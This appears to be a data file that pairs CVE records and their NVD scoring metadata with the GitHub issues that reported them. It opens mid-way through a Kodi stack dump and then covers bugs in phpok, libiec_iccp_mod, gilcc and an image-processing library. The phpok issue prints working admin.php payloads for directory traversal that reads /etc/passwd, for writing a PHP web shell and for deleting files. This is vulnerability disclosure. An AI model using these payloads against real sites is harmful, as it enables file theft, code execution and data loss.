000000E0BFF4DCF0 0000021CBDDD72F0 &"à.¦#ö\x7F" 000000E0BFF4DCF8 00007FFB6E33F05B return to ucrtbase.00007FFB6E33F05B from ??? 000000E0BFF4DD00 000000E0BFF4E110 &"profile/Database/MyMusic82.db" 000000E0BFF4DD08 0000021CBDDD72F0 &"à.¦#ö\x7F" 000000E0BFF4DD10 0000000000000000 000000E0BFF4DD18 0000000000000000 000000E0BFF4DD20 0000021CB4C59AC0 000000E0BFF4DD28 00007FF623A687D5 return to kodi.00007FF623A687D5 from kodi.00007FF6252ADB30 000000E0BFF4DD30 000000E0BFF4E110 &"profile/Database/MyMusic82.db" 000000E0BFF4DD38 0000021CB6C02A20 &"à.¦#ö\x7F" 000000E0BFF4DD40 0000000000000000 000000E0BFF4DD48 000000E0BFF4E618 &"profile/Database/MyMusic82.db" 000000E0BFF4DD50 0000021CB4C59AD0 &"À4¡#ö\x7F" 000000E0BFF4DD58 0000021CB4C59AC0 000000E0BFF4DD60 0000021C00000000 000000E0BFF4DD68 00007FF623E5964B return to kodi.00007FF623E5964B from kodi.00007FF6252ADB30 000000E0BFF4DD70 000000E0BFF4DE80 000000E0BFF4DD78 0000000000000013 000000E0BFF4DD80 FFFFFFFFFFFFFFFE 000000E0BFF4DD88 0000021CBDA60930 "C:\\Users\\THINKPAD\\Desktop\\poc.asx" 000000E0BFF4DD90 0000021CB4AB0100 000000E0BFF4DD98 0000000000000021 000000E0BFF4DDA0 000000000000002F 000000E0BFF4DDA8 000006988439F42C 000000E0BFF4DDB0 0000000000000000 000000E0BFF4DDB8 0000000000000000 000000E0BFF4DDC0 000000E0BFF4EB78 000000E0BFF4DDC8 0000000000000000 000000E0BFF4DDD0 0000021CB6CA4D10 &" ;Ã#ö\x7F" 000000E0BFF4DDD8 0000021CB6C02A20 &"à.¦#ö\x7F" 000000E0BFF4DDE0 000000E0BFF4DEF0 000000E0BFF4DDE8 00007FF623C33FEF return to kodi.00007FF623C33FEF from kodi.00007FF623CF1C60 000000E0BFF4DDF0 0000021CB4AB0100 000000E0BFF4DDF8 0000021CBF797C50 000000E0BFF4DE00 0000000000000000 000000E0BFF4DE08 0000000000000000 000000E0BFF4DE10 0000021CBD0D10D0 &"°Å\n$ö\x7F" 000000E0BFF4DE18 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30 000000E0BFF4DE20 0000021CB4AB0100 000000E0BFF4DE28 0000021CBF797E90 000000E0BFF4DE30 0000000000000000 000000E0BFF4DE38 0000000000000000 000000E0BFF4DE40 0000021CB4AB0000 000000E0BFF4DE48 0000000000000000 000000E0BFF4DE50 FFFFFFFFFFFFFFFE 000000E0BFF4DE58 00007FFB70C358D1 return to ntdll.00007FFB70C358D1 from ntdll.00007FFB70C34FE0 000000E0BFF4DE60 0000021CB4AB0340 000000E0BFF4DE68 FFFFFFFFFFFFFFFE 000000E0BFF4DE70 0000000000000003 000000E0BFF4DE78 0000021CBF523000 000000E0BFF4DE80 0000000000000008 000000E0BFF4DE88 00007FFB70C352DC return to ntdll.00007FFB70C352DC from ntdll.00007FFB70C32DF8 000000E0BFF4DE90 0000000000000000 000000E0BFF4DE98 000000E0BFF4E0F0 "ŒÈ9„˜\x06" 000000E0BFF4DEA0 0000000000000000 000000E0BFF4DEA8 0000000000000000 000000E0BFF4DEB0 0000000000000003 000000E0BFF4DEB8 00007FFB70C352DC return to ntdll.00007FFB70C352DC from ntdll.00007FFB70C32DF8 000000E0BFF4DEC0 0000021CBF3CAC88 "nd descriptors.\n\n Usage:\n\n class C(metaclass=ABCMeta):\n @abstractmethod\n def my_abstract_method(self, ...):\n ...\n " 000000E0BFF4DEC8 0000000000000001 000000E0BFF4DED0 000006988439F6EC 000000E0BFF4DED8 0000000000000001 000000E0BFF4DEE0 0000000000000000 000000E0BFF4DEE8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F" 000000E0BFF4DEF0 0000021CBDA9AEE0 &"ÀÆI%ö\x7F" 000000E0BFF4DEF8 0000021CBD0D10D0 &"°Å\n$ö\x7F" 000000E0BFF4DF00 00000000FFFFFFFF 000000E0BFF4DF08 0000021CBD0D10D0 &"°Å\n$ö\x7F" 000000E0BFF4DF10 000000E0BFF4E020 "¼÷9„˜\x06" 000000E0BFF4DF18 00007FF623CB88AD return to kodi.00007FF623CB88AD from kodi.00007FF6252ADB30 000000E0BFF4DF20 0000000000000000 000000E0BFF4DF28 0000000000000000 000000E0BFF4DF30 00007FF6255DB960 kodi.00007FF6255DB960 000000E0BFF4DF38 0000000000000000 000000E0BFF4DF40 0000021CBF600DA0 "ÝÌÝÌ" 000000E0BFF4DF48 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30 000000E0BFF4DF50 0000021CB4AB0340 000000E0BFF4DF58 00007FFB007000C0 000000E0BFF4DF60 0000021CBF797910 000000E0BFF4DF68 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30 000000E0BFF4DF70 0000021CB4AB0100 000000E0BFF4DF78 0000021CBF0D4AC0 000000E0BFF4DF80 FFFFFFFFFFFFFFFE 000000E0BFF4DF88 FFFFFFFFFFFFFFFE 000000E0BFF4DF90 0000021CB4AB0000 000000E0BFF4DF98 0000000000000000 000000E0BFF4DFA0 0000021CBF001A80 "ÝÌÝÌ" 000000E0BFF4DFA8 FFFFFFFFFFFFFFFE 000000E0BFF4DFB0 000006988439FCFC 000000E0BFF4DFB8 0000021C004002A0 000000E0BFF4DFC0 0000000000000000 000000E0BFF4DFC8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F" 000000E0BFF4DFD0 00000000000002B8 000000E0BFF4DFD8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F" 000000E0BFF4DFE0 0000021CB85729A0 000000E0BFF4DFE8 0000021CBD0A9840 &" <\r$ö\x7F" 000000E0BFF4DFF0 000000E0BFF4E089 "æô¿à" 000000E0BFF4DFF8 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30 000000E0BFF4E000 000006988439F79C 000000E0BFF4E008 00007FFB70C348D0 return to ntdll.00007FFB70C348D0 from ntdll.00007FFB70C35710 000000E0BFF4E010 0000021CBD0D26D0 000000E0BFF4E018 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30 000000E0BFF4E020 000006988439F7BC 000000E0BFF4E028 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30 000000E0BFF4E030 0000021CBD20C1C0 "ð“Q%ö\x7F" 000000E0BFF4E038 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30 000000E0BFF4E040 000006988439F7EC 000000E0BFF4E048 0000021CB69C48D0 &"0«¥#ö\x7F" 000000E0BFF4E050 0000000000000000 000000E0BFF4E058 0000000000000000 000000E0BFF4E060 0000000000000000 000000E0BFF4E068 FFFFFFFFFFFFFFFE 000000E0BFF4E070 FFFFFFFFFFFFFFFE 000000E0BFF4E078 0000021CB4C34800 000000E0BFF4E080 00000000FFFFFFFF 000000E0BFF4E088 000000E0BFF4E618 &"profile/Database/MyMusic82.db" 000000E0BFF4E090 0000021CBDFB4C00 "Thread %s %s terminating (autodelete)" 000000E0BFF4E098 00007FF623FC38D5 return to kodi.00007FF623FC38D5 from kodi.00007FF6252ADB30 000000E0BFF4E0A0 0000000000000000 000000E0BFF4E0A8 000000000000000F 000000E0BFF4E0B0 0000021CBD0D10D0 &"°Å\n$ö\x7F" 000000E0BFF4E0B8 00007FFB6E33F05B return to ucrtbase.00007FFB6E33F05B from ??? 000000E0BFF4E0C0 0000021CBD0AA230 000000E0BFF4E0C8 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30 000000E0BFF4E0D0 000006988439C8EC 000000E0BFF4E0D8 0000021CB85729A0 000000E0BFF4E0E0 000006988439C8FC 000000E0BFF4E0E8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F" 000000E0BFF4E0F0 000006988439C88C 000000E0BFF4E0F8 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30 000000E0BFF4E100 0000000000000000 000000E0BFF4E108 0000021CBDA9AEE0 &"ÀÆI%ö\x7F" 000000E0BFF4E110 0000021CBDFB4A00 "profile/Database/MyMusic82.db" 000000E0BFF4E118 0000021CBD20C1C0 "ð“Q%ö\x7F" 000000E0BFF4E120 0000000000000000 000000E0BFF4E128 000000000000000F 000000E0BFF4E130 000000E0BFF4E240 000000E0BFF4E138 00007FF623CB88AD return to kodi.00007FF623CB88AD from kodi.00007FF6252ADB30 000000E0BFF4E140 000000E0BFF4E201 000000E0BFF4E148 00007FF623C273E1 return to kodi.00007FF623C273E1 from kodi.00007FF6252ADB30 000000E0BFF4E150 00007FF6255193F0 kodi.00007FF6255193F0 000000E0BFF4E158 0000021C00000000 000000E0BFF4E160 0000021CBF0D4CC0 " return list(iterable)\n # Let the base class default method raise the TypeError\n return JSONEncoder.default(self, o)\n\n " 000000E0BFF4E168 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30 000000E0BFF4E170 FFFFFFFFFFFFFFFE 000000E0BFF4E178 FFFFFFFFFFFFFFFE 000000E0BFF4E180 000006988439C81C 000000E0BFF4E188 0000021CBF0D4CC0 " return list(iterable)\n # Let the base class default method raise the TypeError\n return JSONEncoder.default(self, o)\n\n " 000000E0BFF4E190 0000021CBD20A8F0 "àž_%ö\x7F" 000000E0BFF4E198 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30 000000E0BFF4F7E0 0000000000000000 000000E0BFF4F7E8 00007FFB70C62651 return to ntdll.00007FFB70C62651 from ??? 000000E0BFF4F7F0 0000000000000000 000000E0BFF4F7F8 0000000000000000 000000E0BFF4F800 0000000000000000 000000E0BFF4F808 0000000000000000 000000E0BFF4F810 0000000000000000 000000E0BFF4F818 0000000000000000 000000E0BFF4F820 0000000000000000 000000E0BFF4F828 0000000000000000 000000E0BFF4F830 0000000000000000 000000E0BFF4F838 0000000000000000 000000E0BFF4F840 000004E8FFFFFB30 000000E0BFF4F848 000004D0FFFFFB30 000000E0BFF4F850 0000000000000019 000000E0BFF4F858 0000000000000000 000000E0BFF4F860 0000000000000000 000000E0BFF4F868 0000000000000000 000000E0BFF4F870 0000000000000000 000000E0BFF4F878 0000000000000000 000000E0BFF4F880 0000000000000000 000000E0BFF4F888 0000000000000000 000000E0BFF4F890 0000000000000000 000000E0BFF4F898 0000000000000000 000000E0BFF4F8A0 0000000000000000 000000E0BFF4F8A8 0000000000000000 000000E0BFF4F8B0 0000000000000000 000000E0BFF4F8B8 0000000000000000 000000E0BFF4F8C0 0000000000000000 000000E0BFF4F8C8 0000000000000000 000000E0BFF4F8D0 0000000000000000 000000E0BFF4F8D8 0000000000000000 000000E0BFF4F8E0 0000000000000000 000000E0BFF4F8E8 0000000000000000 000000E0BFF4F8F0 0000000000000000 000000E0BFF4F8F8 0000000000000000 000000E0BFF4F900 0000000000000000 000000E0BFF4F908 0000000000000000 000000E0BFF4F910 0000000000000000 000000E0BFF4F918 0000000000000000 ### Your Environment Used Operating system: <!--- Include as many relevant details about the environment you experienced the bug in --> <!--- Put your text below this line. Checkboxes can easily be ticked once issue is created --> - [ ] Windows 10 * 64 - Operating system version/name: - Kodi version: 19.0 <!--- End of this issue --> *note: Once the issue is made we require you to update it with new information or Kodi versions should that be required. Team Kodi will consider your problem report however, we will not make any promises the problem will be solved.*
Kodi v19.0 Buffer Overflow
https://api.github.com/repos/xbmc/xbmc/issues/20305/comments
23
2021-10-12T06:07:43Z
2021-11-14T02:28:57Z
https://github.com/xbmc/xbmc/issues/20305
1,023,403,439
20,305
2,739
CVE-2020-18438
2021-11-02T18:15:07.837
Directory traversal vulnerability in qinggan phpok 5.1, allows attackers to disclose sensitive information, via the title parameter to admin.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/qinggan/phpok/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/qinggan/phpok/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpok:phpok:5.1:*:*:*:*:*:*:*", "matchCriteriaId": "F39153AD-B68D-4595-93AD-AE703E8F5B41", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/qinggan/phpok/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "qinggan", "phpok" ]
## Variable Overwrite Vulnerability from the Entrance of framework,i discovered `parse_str` variable overwrite in `framework/init.php` ![image_1d4agk20clki110s1ii7u6q1gah9.png-146.3kB][9] we could watch `$query_string` parameter in `framework/libs/server.php` : ![image_1d4agn7g08k431a1fsakoi1kjdm.png-135.9kB][10] payload:`http://phpok/?data[script]=passer6y` ![image_1d4ai86gk1ukh1dd0lgt83e6nl9.png-228.1kB][11] ## Vulnerability to read arbitrary files ![image_1d4i1bkhf1fbq1q6nk7g19pe1hjl23.png-402.7kB][13] back to the: framework/admin/tpl_control.php ![image_1d4i1oe4tg81163s1hcn18a21kp530.png-197.8kB][14] framework/admin/appsys_control.php ![image_1d4i1pat21lbr1fe518r01rf2tjs3d.png-443.2kB][15] there is two file have this vulnerability: payload1: ``` /admin.php?c=appsys&f=file_edit&id=fav&title=../../../../../../../etc/passwd ``` payload2: ``` /admin.php?c=tpl&f=edit&id=1&title=../../../../../../../etc/passwd ``` ![image_1d4l4ok81h0c1ee2dk2ann3p1m.png-521.8kB][16] ![image_1d4i1rfar1g7u1ieefsrd4dd0l3q.png-280.1kB][17] ## Arbitrary File Writing to getshell `edit_save_f()` function In `framework/admin/tpl_control.php` 383 line ![image_1d4l5pf9lkqtv2q8cr1t6f6ku4k.png-280.9kB][22] payload:`/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f` ![image_1d4ig2hol1ok17857k61r66bv74k.png-383.1kB][24] ## Arbitrary file delete Vulnerability framework/admin/tpl_control.php 303行 `delfile_f()`函数: ![image_1d4l604qqo9c1krlerf7eu1o1b51.png-247.1kB][25] payload:` /admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php` ![image_1d4ijnk021ui812v11pc8fap1sb351.png-172kB][27] [9]: http://static.zybuluo.com/Passer6y/p13wmvj4khkxren72b6fdvhj/image_1d4agk20clki110s1ii7u6q1gah9.png [10]: http://static.zybuluo.com/Passer6y/3jsnuyq9m72tfqg330ytcfib/image_1d4agn7g08k431a1fsakoi1kjdm.png [11]: http://static.zybuluo.com/Passer6y/fgpw2yg6wjc5o5r1hm9fqx08/image_1d4ai86gk1ukh1dd0lgt83e6nl9.png [13]: http://static.zybuluo.com/Passer6y/pv6mu4h93o84a3o6vbjck74b/image_1d4i1bkhf1fbq1q6nk7g19pe1hjl23.png [14]: http://static.zybuluo.com/Passer6y/pfb89v0i59glsveyitgnmsa5/image_1d4i1oe4tg81163s1hcn18a21kp530.png [15]: http://static.zybuluo.com/Passer6y/hg2cxnqchsm3renmw1sjlvfr/image_1d4i1pat21lbr1fe518r01rf2tjs3d.png [16]: http://static.zybuluo.com/Passer6y/p2zlylym1mfm33vj2rjbmgw5/image_1d4l4ok81h0c1ee2dk2ann3p1m.png [17]: http://static.zybuluo.com/Passer6y/bs2osjm0xntsb9zqzhl9ulyo/image_1d4i1rfar1g7u1ieefsrd4dd0l3q.png [18]: http://static.zybuluo.com/Passer6y/awxmk7gqoazwfskrczgm6diu/image_1d4l58h6eo1l7892im1v7g16352g.png [19]: http://static.zybuluo.com/Passer6y/jyu4m8ywltgdccn0qugy8chf/image_1d4l59l5p1j23upj6grfd1a842t.png [20]: http://static.zybuluo.com/Passer6y/344q4ca2sky0t9anxcdwv1ez/image_1d4l5c0qh1h79tbr16bj1i191a223a.png [21]: http://static.zybuluo.com/Passer6y/tkwncti7c0woomb9v86n13bh/image_1d4l5lbfr1fek1kfa1a9i1nta1hcn47.png [22]:http://static.zybuluo.com/Passer6y/fpwbu40s2yhrz8u9bobpypgy/image_1d4l5pf9lkqtv2q8cr1t6f6ku4k.png [23]: http://static.zybuluo.com/Passer6y/uqtqxwzg456sh1iuoxi1vcpa/image_1d4l51jr2o901dl4r9ff6vfus13.png [24]:http://static.zybuluo.com/Passer6y/v8l0twvzk43u4oyzev8zes3m/image_1d4ig2hol1ok17857k61r66bv74k.png [25]: http://static.zybuluo.com/Passer6y/zb6si257j56p2qexs7ecsed1/image_1d4l604qqo9c1krlerf7eu1o1b51.png [26]: http://static.zybuluo.com/Passer6y/5zowcit791ndjvyt3vxp5yb7/image_1d4l61nqml2roi8i4jv1j1aif5e.png [27]:http://static.zybuluo.com/Passer6y/1a2eynhxyhmmljm5z9ok36qx/image_1d4ijnk021ui812v11pc8fap1sb351.png [28]: http://static.zybuluo.com/Passer6y/f3046swiq74ti2j1iy4bkx0u/image_1d4jrep0n147ufdpgr21k8md3a9.png [29]: http://static.zybuluo.com/Passer6y/w72a50ygueplfvt39s3gj3a4/image_1d4l6afmq17svv8q28m3ev1sih5r.png [30]: http://static.zybuluo.com/Passer6y/0dffvgai9y9fd4cv0bozqgjl/image_1d4juou7p14v9nli1isr1u561ee51m.png [31]: http://static.zybuluo.com/Passer6y/6vda01kdf6371cgnylfro3p3/image_1d4l6siej1ud37qu1ebv1fd11d1m9.png [32]: http://static.zybuluo.com/Passer6y/nyc1cs1p2pcmesp9fw5rmvr5/image_1d4l7b4pd1d0186u17a8cm1ehsm.png [33]: http://static.zybuluo.com/Passer6y/exb2sbtm64zn2dpmlgsx58xj/image_1d4l7d16r1aqq19ov1fn312vi10k023.png
phpok 5.1 have Some Vulnerability
https://api.github.com/repos/qinggan/phpok/issues/4/comments
1
2019-03-06T06:25:51Z
2019-04-28T19:29:17Z
https://github.com/qinggan/phpok/issues/4
417,643,168
4
2,740
CVE-2020-20657
2021-11-02T18:15:07.953
Buffer overflow vulnerability in fcovatti libiec_iccp_mod v1.5, allows attackers to cause a denial of service via an unexpected packet while trying to connect.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fcovatti/libiec_iccp_mod/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fcovatti/libiec_iccp_mod/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libiec_iccp_mod_project:libiec_iccp_mod:1.5:*:*:*:*:*:*:*", "matchCriteriaId": "B80FC647-C393-415F-9AA9-B02EA8C954B0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/fcovatti/libiec_iccp_mod/issues/1
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "fcovatti", "libiec_iccp_mod" ]
`
`
https://api.github.com/repos/fcovatti/libiec_iccp_mod/issues/1/comments
0
2019-10-10T02:31:18Z
2019-10-10T07:00:16Z
https://github.com/fcovatti/libiec_iccp_mod/issues/1
504,995,096
1
2,741
CVE-2020-20658
2021-11-02T18:15:07.997
Buffer overflow vulnerability in fcovatti libiec_iccp_mod v1.5, allows attackers to cause a denail of service when trying to calloc an unexpectiedly large space.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fcovatti/libiec_iccp_mod/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fcovatti/libiec_iccp_mod/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libiec_iccp_mod_project:libiec_iccp_mod:1.5:*:*:*:*:*:*:*", "matchCriteriaId": "B80FC647-C393-415F-9AA9-B02EA8C954B0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/fcovatti/libiec_iccp_mod/issues/2
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "fcovatti", "libiec_iccp_mod" ]
`
`
https://api.github.com/repos/fcovatti/libiec_iccp_mod/issues/2/comments
0
2019-10-10T03:44:20Z
2019-10-10T06:59:46Z
https://github.com/fcovatti/libiec_iccp_mod/issues/2
505,014,575
2
2,742
CVE-2020-21572
2021-11-02T18:15:08.037
Buffer overflow vulnerability in function src_parser_trans_stage_1_2_3 trgil gilcc before commit 803969389ca9c06237075a7f8eeb1a19e6651759, allows attackers to cause a denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/trgil/gilcc/commit/803969389ca9c06237075a7f8eeb1a19e6651759" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/trgil/gilcc/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/trgil/gilcc/commit/803969389ca9c06237075a7f8eeb1a19e6651759" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/trgil/gilcc/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gilcc_project:gilcc:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBB8171A-9F3D-46B6-B948-F89F365D61FD", "versionEndExcluding": "2019-12-22", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/trgil/gilcc/issues/1
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "trgil", "gilcc" ]
hi, I find out-of-bounds array access and bufferoverflow in **src_parser.c:src_parser_trans_stage_1_2_3** :) [crash.zip](https://github.com/trgil/gilcc/files/3992356/crash.zip)
out-of-bounds array access and bufferoverflow
https://api.github.com/repos/trgil/gilcc/issues/1/comments
3
2019-12-22T10:54:02Z
2020-02-29T11:29:42Z
https://github.com/trgil/gilcc/issues/1
541,435,995
1
2,743
CVE-2020-21573
2021-11-02T18:15:08.077
An issue was discoverered in in abhijitnathwani image-processing v0.1.0, allows local attackers to cause a denial of service via a crafted image file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/abhijitnathwani/image-processing/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/abhijitnathwani/image-processing/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:image-processing_project:image-processing:0.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "B2990A14-AAD6-476D-9A2B-A7357984C9D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/abhijitnathwani/image-processing/issues/3
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "abhijitnathwani", "image-processing" ]
hi, I only modified the input image file and cause stack exhausted. I think variable **_buffer_** should not be defined as a local variable, but should be dynamically applied for heap space. :) [crash.zip](https://github.com/abhijitnathwani/image-processing/files/3994094/crash.zip)
Stack exhuasted
https://api.github.com/repos/abhijitnathwani/image-processing/issues/3/comments
2
2019-12-23T07:55:31Z
2020-07-08T09:18:08Z
